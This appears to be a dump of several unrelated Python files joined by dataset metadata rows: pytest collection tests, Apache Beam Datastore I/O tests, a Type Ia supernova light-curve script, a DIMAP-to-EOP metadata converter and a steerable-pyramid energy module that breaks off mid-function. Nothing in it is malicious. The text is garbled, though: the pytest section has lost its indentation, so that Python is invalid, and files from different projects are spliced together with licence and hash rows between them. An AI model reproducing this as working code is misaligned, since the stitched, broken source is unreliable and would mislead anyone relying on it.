fspath, lineno, modpath = item.reportinfo()
assert fspath == item.fspath
assert lineno == 0
assert modpath == "test_func"
def test_class_reportinfo(self, testdir):
modcol = testdir.getmodulecol(
"""
# lineno 0
class TestClass(object):
def test_hello(self): pass
"""
)
classcol = testdir.collect_by_name(modcol, "TestClass")
fspath, lineno, msg = classcol.reportinfo()
assert fspath == modcol.fspath
assert lineno == 1
assert msg == "TestClass"
@pytest.mark.filterwarnings(
"ignore:usage of Generator.Function is deprecated, please use pytest.Function instead"
)
def test_generator_reportinfo(self, testdir):
modcol = testdir.getmodulecol(
"""
# lineno 0
def test_gen():
def check(x):
assert x
yield check, 3
"""
)
gencol = testdir.collect_by_name(modcol, "test_gen")
fspath, lineno, modpath = gencol.reportinfo()
assert fspath == modcol.fspath
assert lineno == 1
assert modpath == "test_gen"
genitem = gencol.collect()[0]
fspath, lineno, modpath = genitem.reportinfo()
assert fspath == modcol.fspath
assert lineno == 2
assert modpath == "test_gen[0]"
"""
def test_func():
pass
def test_genfunc():
def check(x):
pass
yield check, 3
class TestClass(object):
def test_method(self):
pass
"""
def test_reportinfo_with_nasty_getattr(self, testdir):
# https://github.com/pytest-dev/pytest/issues/1204
modcol = testdir.getmodulecol(
"""
# lineno 0
class TestClass(object):
def __getattr__(self, name):
return "this is not an int"
def test_foo(self):
pass
"""
)
classcol = testdir.collect_by_name(modcol, "TestClass")
instance = classcol.collect()[0]
fspath, lineno, msg = instance.reportinfo()
def test_customized_python_discovery(testdir):
testdir.makeini(
"""
[pytest]
python_files=check_*.py
python_classes=Check
python_functions=check
"""
)
p = testdir.makepyfile(
"""
def check_simple():
pass
class CheckMyApp(object):
def check_meth(self):
pass
"""
)
p2 = p.new(basename=p.basename.replace("test", "check"))
p.move(p2)
result = testdir.runpytest("--collect-only", "-s")
result.stdout.fnmatch_lines(
["*check_customized*", "*check_simple*", "*CheckMyApp*", "*check_meth*"]
)
result = testdir.runpytest()
assert result.ret == 0
result.stdout.fnmatch_lines(["*2 passed*"])
def test_customized_python_discovery_functions(testdir):
testdir.makeini(
"""
[pytest]
python_functions=_test
"""
)
testdir.makepyfile(
"""
def _test_underscore():
pass
"""
)
result = testdir.runpytest("--collect-only", "-s")
result.stdout.fnmatch_lines(["*_test_underscore*"])
result = testdir.runpytest()
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collector_attributes(testdir):
testdir.makeconftest(
"""
import pytest
def pytest_pycollect_makeitem(collector):
assert collector.Function == pytest.Function
assert collector.Class == pytest.Class
assert collector.Instance == pytest.Instance
assert collector.Module == pytest.Module
"""
)
testdir.makepyfile(
"""
def test_hello():
pass
"""
)
result = testdir.runpytest(SHOW_PYTEST_WARNINGS_ARG)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_customize_through_attributes(testdir):
testdir.makeconftest(
"""
import pytest
class MyFunction(pytest.Function):
pass
class MyInstance(pytest.Instance):
Function = MyFunction
class MyClass(pytest.Class):
Instance = MyInstance
def pytest_pycollect_makeitem(collector, name, obj):
if name.startswith("MyTestClass"):
return MyClass(name, parent=collector)
"""
)
testdir.makepyfile(
"""
class MyTestClass(object):
def test_hello(self):
pass
"""
)
result = testdir.runpytest("--collect-only", SHOW_PYTEST_WARNINGS_ARG)
result.stdout.fnmatch_lines(["*MyClass*", "*MyFunction*test_hello*"])
def test_unorderable_types(testdir):
testdir.makepyfile(
"""
class TestJoinEmpty(object):
pass
def make_test():
class Test(object):
pass
Test.__name__ = "TestFoo"
return Test
TestFoo = make_test()
"""
)
result = testdir.runpytest()
assert "TypeError" not in result.stdout.str()
assert result.ret == EXIT_NOTESTSCOLLECTED
def test_collect_functools_partial(testdir):
"""
    Test that collection of functools.partial objects works, and that arguments
    to the wrapped functions are dealt with correctly (see #811).
"""
testdir.makepyfile(
"""
import functools
import pytest
@pytest.fixture
def fix1():
return 'fix1'
@pytest.fixture
def fix2():
return 'fix2'
def check1(i, fix1):
assert i == 2
assert fix1 == 'fix1'
def check2(fix1, i):
assert i == 2
assert fix1 == 'fix1'
def check3(fix1, i, fix2):
assert i == 2
assert fix1 == 'fix1'
assert fix2 == 'fix2'
test_ok_1 = functools.partial(check1, i=2)
test_ok_2 = functools.partial(check1, i=2, fix1='fix1')
test_ok_3 = functools.partial(check1, 2)
test_ok_4 = functools.partial(check2, i=2)
test_ok_5 = functools.partial(check3, i=2)
test_ok_6 = functools.partial(check3, i=2, fix1='fix1')
test_fail_1 = functools.partial(check2, 2)
test_fail_2 = functools.partial(check3, 2)
"""
)
result = testdir.inline_run()
result.assertoutcome(passed=6, failed=2)
@pytest.mark.filterwarnings("default")
def test_dont_collect_non_function_callable(testdir):
"""Test for issue https://github.com/pytest-dev/pytest/issues/331
    In this case an INTERNALERROR occurred when trying to report the failure of
    a test like this one, because pytest failed to get the source lines.
"""
testdir.makepyfile(
"""
class Oh(object):
def __call__(self):
pass
test_a = Oh()
def test_real():
pass
"""
)
result = testdir.runpytest("-rw")
result.stdout.fnmatch_lines(
[
"*collected 1 item*",
"*test_dont_collect_non_function_callable.py:2: *cannot collect 'test_a' because it is not a function*",
"*1 passed, 1 warnings in *",
]
)
def test_class_injection_does_not_break_collection(testdir):
"""Tests whether injection during collection time will terminate testing.
In this case the error should not occur if the TestClass itself
is modified during collection time, and the original method list
is still used for collection.
"""
testdir.makeconftest(
"""
from test_inject import TestClass
def pytest_generate_tests(metafunc):
TestClass.changed_var = {}
"""
)
testdir.makepyfile(
test_inject='''
class TestClass(object):
def test_injection(self):
"""Test being parametrized."""
pass
'''
)
result = testdir.runpytest()
assert (
"RuntimeError: dictionary changed size during iteration"
not in result.stdout.str()
)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_syntax_error_with_non_ascii_chars(testdir):
"""Fix decoding issue while formatting SyntaxErrors during collection (#578)
"""
testdir.makepyfile(
u"""
# -*- coding: UTF-8 -*-
☃
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*ERROR collecting*", "*SyntaxError*", "*1 error in*"])
def test_skip_duplicates_by_default(testdir):
"""Test for issue https://github.com/pytest-dev/pytest/issues/1609 (#1609)
Ignore duplicate directories.
"""
a = testdir.mkdir("a")
fh = a.join("test_a.py")
fh.write(
textwrap.dedent(
"""\
import pytest
def test_real():
pass
"""
)
)
result = testdir.runpytest(a.strpath, a.strpath)
result.stdout.fnmatch_lines(["*collected 1 item*"])
def test_keep_duplicates(testdir):
"""Test for issue https://github.com/pytest-dev/pytest/issues/1609 (#1609)
Use --keep-duplicates to collect tests from duplicate directories.
"""
a = testdir.mkdir("a")
fh = a.join("test_a.py")
fh.write(
textwrap.dedent(
"""\
import pytest
def test_real():
pass
"""
)
)
result = testdir.runpytest("--keep-duplicates", a.strpath, a.strpath)
result.stdout.fnmatch_lines(["*collected 2 item*"])
def test_package_collection_infinite_recursion(testdir):
testdir.copy_example("collect/package_infinite_recursion")
result = testdir.runpytest()
result.stdout.fnmatch_lines("*1 passed*")
def test_package_collection_init_given_as_argument(testdir):
"""Regression test for #3749"""
p = testdir.copy_example("collect/package_init_given_as_arg")
result = testdir.runpytest(p / "pkg" / "__init__.py")
result.stdout.fnmatch_lines("*1 passed*")
def test_package_with_modules(testdir):
"""
.
└── root
├── __init__.py
├── sub1
│ ├── __init__.py
│ └── sub1_1
│ ├── __init__.py
│ └── test_in_sub1.py
└── sub2
└── test
└── test_in_sub2.py
"""
root = testdir.mkpydir("root")
sub1 = root.mkdir("sub1")
sub1.ensure("__init__.py")
sub1_test = sub1.mkdir("sub1_1")
sub1_test.ensure("__init__.py")
sub2 = root.mkdir("sub2")
sub2_test = sub2.mkdir("sub2")
sub1_test.join("test_in_sub1.py").write("def test_1(): pass")
sub2_test.join("test_in_sub2.py").write("def test_2(): pass")
# Execute from .
result = testdir.runpytest("-v", "-s")
result.assert_outcomes(passed=2)
# Execute from . with one argument "root"
result = testdir.runpytest("-v", "-s", "root")
result.assert_outcomes(passed=2)
# Chdir into package's root and execute with no args
root.chdir()
result = testdir.runpytest("-v", "-s")
result.assert_outcomes(passed=2)
def test_package_ordering(testdir):
"""
.
└── root
├── Test_root.py
├── __init__.py
├── sub1
│ ├── Test_sub1.py
│ └── __init__.py
└── sub2
└── test
└── test_sub2.py
"""
testdir.makeini(
"""
[pytest]
python_files=*.py
"""
)
root = testdir.mkpydir("root")
sub1 = root.mkdir("sub1")
sub1.ensure("__init__.py")
sub2 = root.mkdir("sub2")
sub2_test = sub2.mkdir("sub2")
root.join("Test_root.py").write("def test_1(): pass")
sub1.join("Test_sub1.py").write("def test_2(): pass")
sub2_test.join("test_sub2.py").write("def test_3(): pass")
# Execute from .
result = testdir.runpytest("-v", "-s")
result.assert_outcomes(passed=3)
| mit | -2,220,275,439,364,280,600 | 30.814064 | 116 | 0.530421 | false |
axbaretto/beam | sdks/python/apache_beam/io/gcp/datastore/v1/datastoreio_test.py | 1 | 12457 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import unittest
from builtins import map
from builtins import range
from builtins import zip
from mock import MagicMock
from mock import call
from mock import patch
# Protect against environments where datastore library is not available.
# pylint: disable=wrong-import-order, wrong-import-position, ungrouped-imports
try:
from google.cloud.proto.datastore.v1 import datastore_pb2
from apache_beam.io.gcp.datastore.v1 import fake_datastore
from apache_beam.io.gcp.datastore.v1 import helper
from google.cloud.proto.datastore.v1 import query_pb2
from apache_beam.io.gcp.datastore.v1 import query_splitter
from apache_beam.io.gcp.datastore.v1 import util
from apache_beam.io.gcp.datastore.v1.datastoreio import ReadFromDatastore
from apache_beam.io.gcp.datastore.v1.datastoreio import WriteToDatastore
from apache_beam.io.gcp.datastore.v1.datastoreio import _Mutate
from google.protobuf import timestamp_pb2
from googledatastore import helper as datastore_helper
except (ImportError, TypeError):
datastore_pb2 = None
# pylint: enable=wrong-import-order, wrong-import-position, ungrouped-imports
class DatastoreioTest(unittest.TestCase):
_PROJECT = 'project'
_KIND = 'kind'
_NAMESPACE = 'namespace'
@unittest.skipIf(
sys.version_info[0] == 3,
'v1/datastoreio does not support Python 3 TODO: BEAM-4543')
@unittest.skipIf(datastore_pb2 is None, 'GCP dependencies are not installed')
def setUp(self):
self._mock_datastore = MagicMock()
self._query = query_pb2.Query()
self._query.kind.add().name = self._KIND
self._WRITE_BATCH_INITIAL_SIZE = util.WRITE_BATCH_INITIAL_SIZE
def get_timestamp(self):
return timestamp_pb2.Timestamp(seconds=1234)
def test_get_estimated_size_bytes_without_namespace(self):
entity_bytes = 100
timestamp = self.get_timestamp()
self.check_estimated_size_bytes(entity_bytes, timestamp)
def test_get_estimated_size_bytes_with_namespace(self):
entity_bytes = 100
timestamp = self.get_timestamp()
self.check_estimated_size_bytes(entity_bytes, timestamp, self._NAMESPACE)
def test_SplitQueryFn_with_num_splits(self):
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
num_splits = 23
def fake_get_splits(datastore, query, num_splits, partition=None):
return self.split_query(query, num_splits)
with patch.object(query_splitter,
'get_splits',
side_effect=fake_get_splits):
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, num_splits)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(len(returned_split_queries), num_splits)
self.assertEqual(0, len(self._mock_datastore.run_query.call_args_list))
self.verify_unique_keys(returned_split_queries)
def test_SplitQueryFn_without_num_splits(self):
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
# Force SplitQueryFn to compute the number of query splits
num_splits = 0
expected_num_splits = 23
entity_bytes = (
expected_num_splits * ReadFromDatastore._DEFAULT_BUNDLE_SIZE_BYTES)
with patch.object(ReadFromDatastore,
'get_estimated_size_bytes',
return_value=entity_bytes):
def fake_get_splits(datastore, query, num_splits, partition=None):
return self.split_query(query, num_splits)
with patch.object(query_splitter,
'get_splits',
side_effect=fake_get_splits):
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, num_splits)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(len(returned_split_queries), expected_num_splits)
self.assertEqual(
0, len(self._mock_datastore.run_query.call_args_list))
self.verify_unique_keys(returned_split_queries)
def test_SplitQueryFn_with_query_limit(self):
"""A test that verifies no split is performed when the query has a limit."""
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
self._query.limit.value = 3
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, 4)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(1, len(returned_split_queries))
self.assertEqual(0, len(self._mock_datastore.method_calls))
def test_SplitQueryFn_with_exception(self):
"""A test that verifies that no split is performed when failures occur."""
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
# Force SplitQueryFn to compute the number of query splits
num_splits = 0
expected_num_splits = 1
entity_bytes = (
expected_num_splits * ReadFromDatastore._DEFAULT_BUNDLE_SIZE_BYTES)
with patch.object(ReadFromDatastore,
'get_estimated_size_bytes',
return_value=entity_bytes):
with patch.object(query_splitter,
'get_splits',
side_effect=ValueError("Testing query split error")):
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, num_splits)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(len(returned_split_queries), expected_num_splits)
self.assertEqual(returned_split_queries[0][1], self._query)
self.assertEqual(
0, len(self._mock_datastore.run_query.call_args_list))
self.verify_unique_keys(returned_split_queries)
def test_DatastoreWriteFn_with_empty_batch(self):
self.check_DatastoreWriteFn(0)
def test_DatastoreWriteFn_with_one_batch(self):
num_entities_to_write = self._WRITE_BATCH_INITIAL_SIZE * 1 - 50
self.check_DatastoreWriteFn(num_entities_to_write)
def test_DatastoreWriteFn_with_multiple_batches(self):
num_entities_to_write = self._WRITE_BATCH_INITIAL_SIZE * 3 + 50
self.check_DatastoreWriteFn(num_entities_to_write)
def test_DatastoreWriteFn_with_batch_size_exact_multiple(self):
num_entities_to_write = self._WRITE_BATCH_INITIAL_SIZE * 2
self.check_DatastoreWriteFn(num_entities_to_write)
def test_DatastoreWriteFn_with_dynamic_batch_sizes(self):
num_entities_to_write = self._WRITE_BATCH_INITIAL_SIZE * 3 + 50
self.check_DatastoreWriteFn(
num_entities_to_write, use_fixed_batch_size=False)
def check_DatastoreWriteFn(self, num_entities, use_fixed_batch_size=True):
"""A helper function to test DatastoreWriteFn."""
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
entities = [
e.entity for e in fake_datastore.create_entities(num_entities)
]
expected_mutations = list(
map(WriteToDatastore.to_upsert_mutation, entities))
actual_mutations = []
self._mock_datastore.commit.side_effect = (
fake_datastore.create_commit(actual_mutations))
fixed_batch_size = None
if use_fixed_batch_size:
fixed_batch_size = self._WRITE_BATCH_INITIAL_SIZE
datastore_write_fn = _Mutate.DatastoreWriteFn(
self._PROJECT, fixed_batch_size=fixed_batch_size)
datastore_write_fn.start_bundle()
for mutation in expected_mutations:
datastore_write_fn.process(mutation)
datastore_write_fn.finish_bundle()
self.assertEqual(actual_mutations, expected_mutations)
if use_fixed_batch_size:
self.assertEqual(
(num_entities - 1) // self._WRITE_BATCH_INITIAL_SIZE + 1,
self._mock_datastore.commit.call_count)
else:
self._mock_datastore.commit.assert_called()
def test_DatastoreWriteLargeEntities(self):
"""100*100kB entities gets split over two Commit RPCs."""
with patch.object(helper,
'get_datastore',
return_value=self._mock_datastore):
entities = [e.entity for e in fake_datastore.create_entities(100)]
datastore_write_fn = _Mutate.DatastoreWriteFn(
self._PROJECT, fixed_batch_size=self._WRITE_BATCH_INITIAL_SIZE)
datastore_write_fn.start_bundle()
for entity in entities:
datastore_helper.add_properties(
entity, {'large': u'A' * 100000}, exclude_from_indexes=True)
datastore_write_fn.process(WriteToDatastore.to_upsert_mutation(entity))
datastore_write_fn.finish_bundle()
self.assertEqual(2, self._mock_datastore.commit.call_count)
def verify_unique_keys(self, queries):
"""A helper function that verifies if all the queries have unique keys."""
keys, _ = zip(*queries)
keys = set(keys)
self.assertEqual(len(keys), len(queries))
def check_estimated_size_bytes(self, entity_bytes, timestamp, namespace=None):
"""A helper method to test get_estimated_size_bytes"""
timestamp_req = helper.make_request(
self._PROJECT, namespace, helper.make_latest_timestamp_query(namespace))
timestamp_resp = self.make_stats_response(
{'timestamp': datastore_helper.from_timestamp(timestamp)})
kind_stat_req = helper.make_request(
self._PROJECT,
namespace,
helper.make_kind_stats_query(
namespace,
self._query.kind[0].name,
datastore_helper.micros_from_timestamp(timestamp)))
kind_stat_resp = self.make_stats_response({'entity_bytes': entity_bytes})
def fake_run_query(req):
if req == timestamp_req:
return timestamp_resp
elif req == kind_stat_req:
return kind_stat_resp
else:
print(kind_stat_req)
raise ValueError("Unknown req: %s" % req)
self._mock_datastore.run_query.side_effect = fake_run_query
self.assertEqual(
entity_bytes,
ReadFromDatastore.get_estimated_size_bytes(
self._PROJECT, namespace, self._query, self._mock_datastore))
self.assertEqual(
self._mock_datastore.run_query.call_args_list,
[call(timestamp_req), call(kind_stat_req)])
def make_stats_response(self, property_map):
resp = datastore_pb2.RunQueryResponse()
entity_result = resp.batch.entity_results.add()
datastore_helper.add_properties(entity_result.entity, property_map)
return resp
def split_query(self, query, num_splits):
"""Generate dummy query splits."""
split_queries = []
for _ in range(0, num_splits):
q = query_pb2.Query()
q.CopyFrom(query)
split_queries.append(q)
return split_queries
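# Illustrative sketch (not part of the original test suite): how the transforms
# exercised above are typically used inside a Beam pipeline. The exact pipeline
# wiring is an assumption based on the public datastoreio API of this era, and
# the project, query and entities arguments are placeholders.
def _pipeline_usage_sketch(project, query, entities):
  import apache_beam as beam
  # write: a PCollection of entity protobufs is turned into upsert mutations
  # and committed in batches by WriteToDatastore
  with beam.Pipeline() as p:
    _ = p | 'create' >> beam.Create(entities) | 'write' >> WriteToDatastore(project)
  # read: ReadFromDatastore splits the query and runs the splits in parallel
  with beam.Pipeline() as p:
    _ = p | 'read' >> ReadFromDatastore(project, query)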
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 1,300,370,424,797,232,600 | 38.798722 | 80 | 0.6687 | false |
tayebzaidi/snova_analysis | Miscellaneous/typ1a_features.py | 1 | 2252 | import matplotlib.pyplot as plt
import scipy.interpolate as scinterp
import numpy as np
import peakfinding
import peak_original
import smoothing
import plotter
import random
import readin
import sys
import os
if __name__ == '__main__':
Mbdata = []
delM15data = []
path = "/Users/zaidi/Documents/REU/restframe/"
filenames = os.listdir(path)
random.shuffle(filenames)
for filename in filenames:
current_file = os.path.join(path, filename)
data= readin.readin_SNrest(filename)
indB = np.where((data.band == 'B'))
Bdata = data[indB]
Bdata = np.sort(Bdata)
if len(Bdata.phase) > 3:
            # fit a smoothing spline to the B-band light curve (phase vs. magnitude)
            spl = scinterp.UnivariateSpline(Bdata.phase, Bdata.mag)
spl.set_smoothing_factor(2./len(Bdata.phase))
phase_new = np.arange(Bdata.phase[0], Bdata.phase[-1], 1)
mag_new = spl(phase_new)
maxp, minp = peak_original.peakdet(mag_new, 0.5, phase_new)
            # keep only light curves whose peak (magnitude minimum) falls within 5 days of phase 0
            if len(minp) > 0 and minp[0][0] < 5 and minp[0][0] > -5:
                # Mb: magnitude at peak; delM15: peak magnitude minus the magnitude
                # 15 days after peak (negative of the usual delta-m15 decline)
                Mb = minp[0][1]
                delM15 = minp[0][1] - spl(minp[0][0]+15)
Mbdata.append(Mb)
delM15data.append(delM15)
if delM15 > 0 or delM15 < -5:
print minp
print filename
print spl(minp[0][0] + 15)
fig = plt.figure(1)
ax = fig.add_subplot(1,1,1)
ax.plot(phase_new, mag_new)
ax.plot(Bdata.phase, Bdata.mag)
if len(minp) > 0:
ax.scatter(minp[:,0],minp[:,1])
plt.show(fig)
'''
maxp, minp = peakfinding.peakdetect(mag_new, phase_new, 200, 1.5)
if len(minp) > 0:
print minp
print filename
fig = plt.figure(1)
ax = fig.add_subplot(1,1,1)
#ax.scatter(minp[:,0], minp[:,1],'bo')
#ax.plot(Bdata.phase, Bdata.mag)
#plt.show(fig)
'''
#interp = smoothing.Interpolate1D(data.phase
print Mbdata
print delM15data
fig = plt.figure(2)
ax = fig.add_subplot(1,1,1)
ax.scatter(Mbdata, delM15data)
plt.show(fig)
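# Illustrative sketch (not part of the original script): the M_B / delta-m15
# computation above, reduced to synthetic data so the shape of the calculation
# is easy to follow. The parabolic "light curve" and the plain argmin peak
# finder are stand-ins for the real data and for peak_original.peakdet.
def _delta_m15_sketch():
    # synthetic B-band light curve: brightest (minimum magnitude) at phase 0
    phase = np.linspace(-10., 30., 41)
    mag = 15.0 + 0.01 * phase ** 2
    # same smoothing-spline fit as in the main loop above
    spl = scinterp.UnivariateSpline(phase, mag)
    spl.set_smoothing_factor(2. / len(phase))
    phase_new = np.arange(phase[0], phase[-1], 1)
    mag_new = spl(phase_new)
    peak_idx = np.argmin(mag_new)
    Mb = mag_new[peak_idx]
    # peak magnitude minus the magnitude 15 days later, matching the sign
    # convention used in the main loop above
    delM15 = Mb - spl(phase_new[peak_idx] + 15)
    return Mb, delM15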
| gpl-3.0 | -7,822,784,365,329,970,000 | 33.121212 | 73 | 0.521314 | false |
DREAM-ODA-OS/tools | metadata/dimap2eop.py | 1 | 3474 | #!/usr/bin/env python
#------------------------------------------------------------------------------
#
# Extract O&M-EOP metadata document.
#
# Project: EO Metadata Handling
# Authors: Martin Paces <[email protected]>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2013 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
import traceback
import sys
import os.path
from lxml import etree as et
from profiles.interfaces import ProfileDimap
from profiles.spot6_ortho import ProfileSpot6Ortho
from profiles.spot_view import ProfileSpotView
from profiles.spot_scene_1a import ProfileSpotScene1a
from profiles.pleiades1_ortho import ProfilePleiades1Ortho
XML_OPTS = {'pretty_print': True, 'xml_declaration': True, 'encoding': 'utf-8'}
PROFILES = (
ProfileSpotScene1a, ProfileSpotView,
ProfileSpot6Ortho, ProfilePleiades1Ortho,
)
def main(fname):
xml = et.parse(fname, et.XMLParser(remove_blank_text=True))
profile = get_profile(xml)
print et.tostring(profile.extract_eop_metadata(xml, file_name=fname), **XML_OPTS)
def get_profile(xml):
for item in PROFILES:
if item.check_profile(xml):
return item
prf = ProfileDimap.get_dimap_profile(xml)
if prf is None:
raise ValueError("Not a DIMAP XML document!")
profile, version = prf
raise ValueError("Unsupported DIMAP version %s profile '%s'!"%(version, profile))
#------------------------------------------------------------------------------
if __name__ == "__main__":
EXENAME = os.path.basename(sys.argv[0])
DEBUG = False
try:
XML = sys.argv[1]
for arg in sys.argv[2:]:
if arg == "DEBUG":
DEBUG = True # dump debuging output
except IndexError:
print >>sys.stderr, "ERROR: %s: Not enough input arguments!"%EXENAME
print >>sys.stderr
print >>sys.stderr, "Extract EOP XML metadata from DIMAP XML metadata."
print >>sys.stderr
print >>sys.stderr, "USAGE: %s <input-xml> [DEBUG]"%EXENAME
sys.exit(1)
if DEBUG:
print >>sys.stderr, "input-xml: ", XML
try:
main(XML)
except Exception as exc:
print >>sys.stderr, "ERROR: %s: %s "%(EXENAME, exc)
if DEBUG:
print >>sys.stderr, traceback.format_exc()
sys.exit(1)
| mit | -2,620,814,347,079,095,300 | 36.354839 | 85 | 0.632988 | false |
billbrod/spatial-frequency-preferences | sfp/image_computable.py | 1 | 6815 | #!/usr/bin/python
"""code to help run the image-computable version of the model
we're using this primarily to check the effect of vignetting, but this does make our project
image-computable (though it's a linear model and so will fail in some trivial cases)
"""
import itertools
import argparse
import numpy as np
import pandas as pd
import pyrtools as pt
from scipy import interpolate
def upsample(signal, target_shape):
"""upsample a signal to target_shape
this uses scipy's interpolate.interp2d (and so will end up with a smoothed signal)
"""
x = np.linspace(-(signal.shape[0]-1)/2, (signal.shape[0]-1)/2, num=signal.shape[0])
y = np.linspace(-(signal.shape[1]-1)/2, (signal.shape[1]-1)/2, num=signal.shape[1])
f = interpolate.interp2d(x, y, signal)
x = np.linspace(-(signal.shape[0]-1)/2, (signal.shape[0]-1)/2, num=target_shape[0])
y = np.linspace(-(signal.shape[1]-1)/2, (signal.shape[1]-1)/2, num=target_shape[1])
return f(x,y)
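# Illustrative sketch (assumption: not part of the original module): upsample a
# small 4x4 signal to 8x8; the interpolated output keeps the centered coordinate
# convention used above and simply has the target shape.
def _upsample_sketch():
    signal = np.arange(16, dtype=float).reshape(4, 4)
    upsampled = upsample(signal, (8, 8))
    assert upsampled.shape == (8, 8)
    return upsampled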
def calc_energy_and_filters(stim, stim_df, n_orientations=6, save_path_template=None):
"""this creates the energy and filter arrays
We assume the stimuli have natural groups, here indexed by the "class_idx" column in stim_df,
and all stimuli within these groups should be considered the same stimuli, that is, we sum the
    energy across all of them. For the spatial frequency project, these are the different phases of
the gratings (because of how we structure our experiment, we estimate a response amplitude to
all phases together).
Note that this will take a while to run (~10 or 20 minutes). Since it only needs to run once
    per experiment, we didn't bother to make it efficient at all. The outputs will also be very large,
    totalling about 11GB.
Parameters
----------
stim : np.ndarray
The stimuli to produce energy for. Should have shape (n, *img_size), where n is the number
of total stimuli.
stim_df : pd.DataFrame
The DataFrame describing the stimuli. Must contain the column "class_idx", which indexes
the different stimulus classes (see above)
n_orientations : int
the number of orientations in the steerable pyramid. 6 is the number used to model fMRI
voxels in Roth, Z. N., Heeger, D., & Merriam, E. (2018). Stimulus vignetting and
orientation selectivity in human visual cortex. bioRxiv.
save_path_template : str or None
the template string for the save path we'll use for energy and filters. should end in .npy
and contain one %s, which we'll replace with "energy" and "filters".
Returns
-------
energy : np.ndarray
energy has shape (stim_df.class_idx.nunique(), max_ht, n_orientations, *img_size) and
contains the energy (square and absolute value the complex valued output of
SteerablePyramidFreq; equivalently, square and sum the output of the quadrature pair of
filters that make up the pyramid) for each image, at each scale and orientation. the energy
has all been upsampled to the size of the initial image.
filters : np.ndarray
filters has shape (max_ht, n_orientations, *img_size) and is the fourier transform of the
filters at each scale and orientation, zero-padded so they all have the same size. we only
have one set of filters (instead of one per stimulus class) because the same pyramid was
used for each of them; we ensure this by getting the filters for each stimulus class and
checking that they're individually equal to the average across classes.
"""
img_size = stim.shape[1:]
# this computation comes from the SteerablePyramidFreq code
max_ht = int(np.floor(np.log2(min(img_size))) - 2)
energy = np.zeros((stim_df.class_idx.nunique(), max_ht, n_orientations, *img_size),
dtype=np.float32)
filters = np.zeros_like(energy)
for i, g in stim_df.groupby('class_idx'):
idx = g.index
filled_filters = False
for j in idx:
pyr = pt.pyramids.SteerablePyramidFreq(stim[j], order=n_orientations-1, is_complex=True)
for k, l in itertools.product(range(max_ht), range(n_orientations)):
energy[int(i), k, l, :, :] += upsample(np.abs(pyr.pyr_coeffs[(k, l)])**2, img_size)
# we only want to run this once per stimulus class
if not filled_filters:
if k > 0:
lomask = pyr._lomasks[k-1]
else:
lomask = pyr._lo0mask
filt = pyr._anglemasks[k][l] * pyr._himasks[k] * lomask
pad_num = []
for m in range(2):
pad_num.append([(img_size[m] - filt.shape[m])//2, (img_size[m] - filt.shape[m])//2])
if filt.shape[m] + 2*pad_num[m][0] != img_size[m]:
pad_num[m][0] += img_size[m] - (filt.shape[m] + 2*pad_num[m][0])
filters[int(i), k, l, :, :] = np.pad(filt, pad_num, 'constant', constant_values=0)
filled_filters = True
filter_mean = np.mean(filters, 0)
for i in range(filters.shape[0]):
if not(np.allclose(filter_mean, filters[i,:,:,:,:])):
raise Exception("Something has gone terribly wrong, the filters for stim class %d are different than the rest!" % i)
filters = filter_mean
if save_path_template is not None:
np.save(save_path_template % "energy", energy)
np.save(save_path_template % "filters", filters)
return energy, filters
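# Illustrative sketch (assumption: the stimulus sizes and class structure here
# are made up, not taken from the real experiment): run calc_energy_and_filters
# on two tiny stimulus classes with two "phases" each and check the output
# shapes described in the docstring above.
def _calc_energy_sketch():
    img_size = (32, 32)
    rng = np.random.RandomState(0)
    stim = rng.rand(4, *img_size)
    # two classes of two stimuli each; energy is summed within a class
    stim_df = pd.DataFrame({'class_idx': [0, 0, 1, 1]})
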